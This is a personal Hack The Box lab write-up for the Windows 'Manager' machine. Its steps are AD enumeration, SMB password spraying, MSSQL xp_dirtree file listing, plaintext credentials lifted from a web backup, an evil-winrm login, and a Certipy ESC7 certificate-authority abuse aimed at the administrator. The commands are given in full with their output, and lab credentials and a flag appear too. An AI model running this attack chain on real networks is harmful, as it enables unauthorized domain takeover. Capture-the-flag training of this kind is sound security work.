HTB Manager done
Manager
OS:
Windows
Technology:
MSSQL
SMB
IP Address:
10.10.11.236
Open ports:
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-23 05:11:12Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49722/tcp open msrpc Microsoft Windows RPC
49740/tcp open msrpc Microsoft Windows RPC
Users and pass:
Find creds for SMB
L: operator
P: operator
---
Login to databse: MSSQL
L: manager/operator
P: operator
---
From hidden file
[email protected]
R4v3nBe5tD3veloP3r!123
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.10.11.236_nmap 10.10.11.236 ; cat 10.10.11.236_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-22 22:09 UTC
Nmap scan report for 10.10.11.236
Host is up (0.035s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Manager
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-23 05:11:12Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2024-08-23T05:12:46+00:00; +6h59m59s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2024-08-23T05:12:46+00:00; +7h00m00s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.10.11.236:1433:
| Target_Name: MANAGER
| NetBIOS_Domain_Name: MANAGER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: manager.htb
| DNS_Computer_Name: dc01.manager.htb
| DNS_Tree_Name: manager.htb
|_ Product_Version: 10.0.17763
| ms-sql-info:
| 10.10.11.236:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-08-23T05:07:50
|_Not valid after: 2054-08-23T05:07:50
|_ssl-date: 2024-08-23T05:12:46+00:00; +6h59m59s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-08-23T05:12:46+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-08-23T05:12:46+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49722/tcp open msrpc Microsoft Windows RPC
49740/tcp open msrpc Microsoft Windows RPC
Add IP to /etc/hosts
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ cat /etc/hosts | grep manager
10.10.11.236 manager.htb dc01.manager.htb
Ffuz - http://manager.htb/
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ ffuf -u http://manager.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o manager.htb_ffuz -of all -e .php,.html,.txt,.bac,.backup
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://manager.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup
:: Output file : manager.htb_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
About.html [Status: 200, Size: 5386, Words: 1310, Lines: 157, Duration: 46ms]
Contact.html [Status: 200, Size: 5317, Words: 1298, Lines: 165, Duration: 57ms]
Images [Status: 301, Size: 149, Words: 9, Lines: 2, Duration: 40ms]
[INFO] Adding a new job to the queue: http://manager.htb/Images/FUZZ
Index.html [Status: 200, Size: 18203, Words: 6791, Lines: 507, Duration: 41ms]
about.html [Status: 200, Size: 5386, Words: 1310, Lines: 157, Duration: 48ms]
contact.html [Status: 200, Size: 5317, Words: 1298, Lines: 165, Duration: 47ms]
css [Status: 301, Size: 146, Words: 9, Lines: 2, Duration: 60ms]
[INFO] Adding a new job to the queue: http://manager.htb/css/FUZZ
images [Status: 301, Size: 149, Words: 9, Lines: 2, Duration: 53ms]
[INFO] Adding a new job to the queue: http://manager.htb/images/FUZZ
index.html [Status: 200, Size: 18203, Words: 6791, Lines: 507, Duration: 63ms]
js [Status: 301, Size: 145, Words: 9, Lines: 2, Duration: 44ms]
[INFO] Adding a new job to the queue: http://manager.htb/js/FUZZ
service.html [Status: 200, Size: 7900, Words: 2395, Lines: 224, Duration: 58ms]
[INFO] Starting queued job on target: http://manager.htb/Images/FUZZ
[INFO] Starting queued job on target: http://manager.htb/css/FUZZ
[INFO] Starting queued job on target: http://manager.htb/images/FUZZ
[INFO] Starting queued job on target: http://manager.htb/js/FUZZ
:: Progress: [122814/122814] :: Job [5/5] :: 888 req/sec :: Duration: [0:02:15] :: Errors: 14 ::
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
SMB - rabbithole
Nothing interesing heere
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ crackmapexec smb 10.10.11.236 --shares -u 'anonymous' -p ''
SMB 10.10.11.236 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [+] manager.htb\anonymous:
SMB 10.10.11.236 445 DC01 [+] Enumerated shares
SMB 10.10.11.236 445 DC01 Share Permissions Remark
SMB 10.10.11.236 445 DC01 ----- ----------- ------
SMB 10.10.11.236 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.236 445 DC01 C$ Default share
SMB 10.10.11.236 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.236 445 DC01 NETLOGON Logon server share
SMB 10.10.11.236 445 DC01 SYSVOL Logon server share
Lookup SID
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ /home/kali/.local/bin/lookupsid.py -no-pass [email protected]
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Brute forcing SIDs at 10.10.11.236
[*] StringBinding ncacn_np:10.10.11.236[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209
498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: MANAGER\Administrator (SidTypeUser)
501: MANAGER\Guest (SidTypeUser)
502: MANAGER\krbtgt (SidTypeUser)
512: MANAGER\Domain Admins (SidTypeGroup)
513: MANAGER\Domain Users (SidTypeGroup)
514: MANAGER\Domain Guests (SidTypeGroup)
515: MANAGER\Domain Computers (SidTypeGroup)
516: MANAGER\Domain Controllers (SidTypeGroup)
517: MANAGER\Cert Publishers (SidTypeAlias)
518: MANAGER\Schema Admins (SidTypeGroup)
519: MANAGER\Enterprise Admins (SidTypeGroup)
520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
525: MANAGER\Protected Users (SidTypeGroup)
526: MANAGER\Key Admins (SidTypeGroup)
527: MANAGER\Enterprise Key Admins (SidTypeGroup)
553: MANAGER\RAS and IAS Servers (SidTypeAlias)
571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
1000: MANAGER\DC01$ (SidTypeUser)
1101: MANAGER\DnsAdmins (SidTypeAlias)
1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
1113: MANAGER\Zhong (SidTypeUser)
1114: MANAGER\Cheng (SidTypeUser)
1115: MANAGER\Ryan (SidTypeUser)
1116: MANAGER\Raven (SidTypeUser)
1117: MANAGER\JinWoo (SidTypeUser)
1118: MANAGER\ChinHae (SidTypeUser)
1119: MANAGER\Operator (SidTypeUser)
Create a wordlist of username
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ cat pre_user.txt
498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: MANAGER\Administrator (SidTypeUser)
501: MANAGER\Guest (SidTypeUser)
502: MANAGER\krbtgt (SidTypeUser)
512: MANAGER\Domain Admins (SidTypeGroup)
513: MANAGER\Domain Users (SidTypeGroup)
514: MANAGER\Domain Guests (SidTypeGroup)
515: MANAGER\Domain Computers (SidTypeGroup)
516: MANAGER\Domain Controllers (SidTypeGroup)
517: MANAGER\Cert Publishers (SidTypeAlias)
518: MANAGER\Schema Admins (SidTypeGroup)
519: MANAGER\Enterprise Admins (SidTypeGroup)
520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
525: MANAGER\Protected Users (SidTypeGroup)
526: MANAGER\Key Admins (SidTypeGroup)
527: MANAGER\Enterprise Key Admins (SidTypeGroup)
553: MANAGER\RAS and IAS Servers (SidTypeAlias)
571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
1000: MANAGER\DC01$ (SidTypeUser)
1101: MANAGER\DnsAdmins (SidTypeAlias)
1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
1113: MANAGER\Zhong (SidTypeUser)
1114: MANAGER\Cheng (SidTypeUser)
1115: MANAGER\Ryan (SidTypeUser)
1116: MANAGER\Raven (SidTypeUser)
1117: MANAGER\JinWoo (SidTypeUser)
1118: MANAGER\ChinHae (SidTypeUser)
1119: MANAGER\Operator (SidTypeUser)
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ cat pre_user.txt | grep -i user | awk -F'\' '{print $2}' | awk '{print $1}' | grep -Ev "DC01|Domain|Protected" | tr '[:upper:]' '[:lower:]' | tee users.txt
administrator
guest
krbtgt
zhong
cheng
ryan
raven
jinwoo
chinhae
operator
SMB - bruteforce
Find creds for SMB
L: operator
P: operator
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ crackmapexec smb 10.10.11.236 -u users.txt -p users.txt --continue-on-success | grep "[+]"
SMB 10.10.11.236 445 DC01 [+] manager.htb\operator:operator
SMB - list of shares - rabbithole
Rabbit hole - nothing interesing here
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ smbclient //10.10.11.236/SYSVOL -U operator
Password for [WORKGROUP\operator]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Jul 27 10:19:07 2023
.. D 0 Thu Jul 27 10:19:07 2023
manager.htb Dr 0 Thu Jul 27 10:19:07 2023
5446399 blocks of size 4096. 632757 blocks available
smb: \> cd manager.htb\
ismb: \manager.htb\> dir
. D 0 Thu Jul 27 10:25:25 2023
.. D 0 Thu Jul 27 10:25:25 2023
DfsrPrivate DHSr 0 Thu Jul 27 10:25:25 2023
Policies D 0 Thu Jul 27 10:19:12 2023
scripts D 0 Thu Jul 27 10:19:07 2023
5446399 blocks of size 4096. 632757 blocks available
smb: \manager.htb\>
MSSQL - list files
Login to database
L: manager/operator
P: operator
---
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Manager/impacket-mssqlshell]
└─$ /home/kali/.local/bin/mssqlclient.py manager/operator:[email protected] -windows-auth
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL>
List all files from webserver folder (wwwroot)
List all files from webserver
---
payload:
exec xp_dirtree 'C:\inetpub\wwwroot', 1, 1;
---
SQL> exec xp_dirtree 'C:\inetpub\wwwroot', 1, 1;
subdirectory depth file
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------- -----------
about.html 1 1
contact.html 1 1
css 1 0
images 1 0
index.html 1 1
js 1 0
service.html 1 1
web.config 1 1
website-backup-27-07-23-old.zip 1 1
SQL>
Download backup file from webserver
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ wget manager.htb/website-backup-27-07-23-old.zip
--2024-08-26 21:21:08-- http://manager.htb/website-backup-27-07-23-old.zip
Resolving manager.htb (manager.htb)... 10.10.11.236
Connecting to manager.htb (manager.htb)|10.10.11.236|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1045328 (1021K) [application/x-zip-compressed]
Saving to: ‘website-backup-27-07-23-old.zip’
website-backup-27-07-23-old.z 100%[===============================================>] 1021K 3.86MB/s in 0.3s
2024-08-26 21:21:09 (3.86 MB/s) - ‘website-backup-27-07-23-old.zip’ saved [1045328/1045328]
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ unzip website-backup-27-07-23-old.zip -d website-backup-27-07-23-old
Archive: website-backup-27-07-23-old.zip
inflating: website-backup-27-07-23-old/.old-conf.xml
inflating: website-backup-27-07-23-old/about.html
inflating: website-backup-27-07-23-old/contact.html
inflating: website-backup-27-07-23-old/css/bootstrap.css
inflating: website-backup-27-07-23-old/css/responsive.css
inflating: website-backup-27-07-23-old/css/style.css
inflating: website-backup-27-07-23-old/css/style.css.map
inflating: website-backup-27-07-23-old/css/style.scss
inflating: website-backup-27-07-23-old/images/about-img.png
inflating: website-backup-27-07-23-old/images/body_bg.jpg
extracting: website-backup-27-07-23-old/images/call.png
extracting: website-backup-27-07-23-old/images/call-o.png
inflating: website-backup-27-07-23-old/images/client.jpg
inflating: website-backup-27-07-23-old/images/contact-img.jpg
extracting: website-backup-27-07-23-old/images/envelope.png
extracting: website-backup-27-07-23-old/images/envelope-o.png
inflating: website-backup-27-07-23-old/images/hero-bg.jpg
extracting: website-backup-27-07-23-old/images/location.png
extracting: website-backup-27-07-23-old/images/location-o.png
extracting: website-backup-27-07-23-old/images/logo.png
inflating: website-backup-27-07-23-old/images/menu.png
extracting: website-backup-27-07-23-old/images/next.png
extracting: website-backup-27-07-23-old/images/next-white.png
inflating: website-backup-27-07-23-old/images/offer-img.jpg
inflating: website-backup-27-07-23-old/images/prev.png
extracting: website-backup-27-07-23-old/images/prev-white.png
extracting: website-backup-27-07-23-old/images/quote.png
extracting: website-backup-27-07-23-old/images/s-1.png
extracting: website-backup-27-07-23-old/images/s-2.png
extracting: website-backup-27-07-23-old/images/s-3.png
extracting: website-backup-27-07-23-old/images/s-4.png
extracting: website-backup-27-07-23-old/images/search-icon.png
inflating: website-backup-27-07-23-old/index.html
inflating: website-backup-27-07-23-old/js/bootstrap.js
inflating: website-backup-27-07-23-old/js/jquery-3.4.1.min.js
inflating: website-backup-27-07-23-old/service.html
Find creds in hidden file: .old-conf.xml
Find creds
___
[email protected]
R4v3nBe5tD3veloP3r!123
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ cd website-backup-27-07-23-old
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Manager/website-backup-27-07-23-old]
└─$ ls -a
. .. about.html contact.html css images index.html js .old-conf.xml service.html
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Manager/website-backup-27-07-23-old]
└─$ cat .old-conf.xml
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<server>
<host>dc01.manager.htb</host>
<open-port enabled="true">389</open-port>
<secure-port enabled="false">0</secure-port>
<search-base>dc=manager,dc=htb</search-base>
<server-type>microsoft</server-type>
<access-user>
<user>[email protected]</user>
<password>R4v3nBe5tD3veloP3r!123</password>
</access-user>
<uid-attribute>cn</uid-attribute>
</server>
<search type="full">
<dir-list>
<dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
</dir-list>
</search>
</ldap-conf>
Read flag: user.txt
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Manager/website-backup-27-07-23-old]
└─$ evil-winrm -i 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Raven\Documents> dir
*Evil-WinRM* PS C:\Users\Raven\Documents> cd ..
*Evil-WinRM* PS C:\Users\Raven> dir
Directory: C:\Users\Raven
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 7/27/2023 8:24 AM Desktop
d-r--- 7/27/2023 8:23 AM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos
*Evil-WinRM* PS C:\Users\Raven> cd Desktop
*Evil-WinRM* PS C:\Users\Raven\Desktop> dir
Directory: C:\Users\Raven\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/25/2024 10:05 PM 34 user.txt
*Evil-WinRM* PS C:\Users\Raven\Desktop> type user.txt
3727734656bd91ce7b2d10297a14ecb2
*Evil-WinRM* PS C:\Users\Raven\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
============= ==============================================
manager\raven S-1-5-21-4078382237-1492182817-2568127209-1116
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\Raven\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.11.236
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : 10.10.10.2
*Evil-WinRM* PS C:\Users\Raven\Desktop>
Privilege Escalation
Find vuln ADCS (Active Directory Certificate Services)
Find vuln ESC7, user Raven has dangerous permissions
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ certipy-ad find -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -stdout -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates : [!] Could not find any certificate templates
Add Manage Certificates
I need use Manage CA permission to give Raven the Manage Certificates permission
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ certipy-ad ca -ca manager-DC01-CA -add-officer raven -username [email protected] -p 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
Confirm a new permission for user Raven
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ certipy-ad find -dc-ip 10.10.11.236 -ns 10.10.11.236 -u [email protected] -p 'R4v3nBe5tD3veloP3r!123' -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates : [!] Could not find any certificate templates
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$
Use template SubCA enabled on the CA
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ certipy-ad ca -u [email protected] -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -ca manager-dc01-ca -enable-template subca
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-dc01-ca'
List enabled certificate templates
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ certipy-ad ca -u [email protected] -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -ca manager-dc01-ca -list-templates
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Enabled certificate templates on 'manager-dc01-ca':
SubCA
DirectoryEmailReplication
DomainControllerAuthentication
KerberosAuthentication
EFSRecovery
EFS
DomainController
WebServer
Machine
User
Administrator
Request a certificate based on the SubCA
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ certipy-ad req -u [email protected] -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -ca manager-dc01-ca -template SubCA -upn [email protected]
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 15
Would you like to save the private key? (y/N) y
[*] Saved private key to 15.key
[-] Failed to request certificate
Issue certificaticate
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ certipy-ad ca -u [email protected] -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -ca manager-dc01-ca -add-officer raven -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.11.236:636 - ssl
[+] Default path: DC=manager,DC=htb
[+] Configuration path: CN=Configuration,DC=manager,DC=htb
[+] Trying to get DCOM connection for: 10.10.11.236
[*] Successfully added officer 'Raven' on 'manager-dc01-ca'
Add Manage Certificates again
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ certipy-ad ca -u [email protected] -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -ca manager-dc01-ca -issue-request 15
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
Retrieve the issued certificate with req command
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ certipy-ad req -u [email protected] -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -ca manager-dc01-ca -retrieve 15
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 15
[*] Successfully retrieved certificate
[*] Got certificate with UPN '[email protected]'
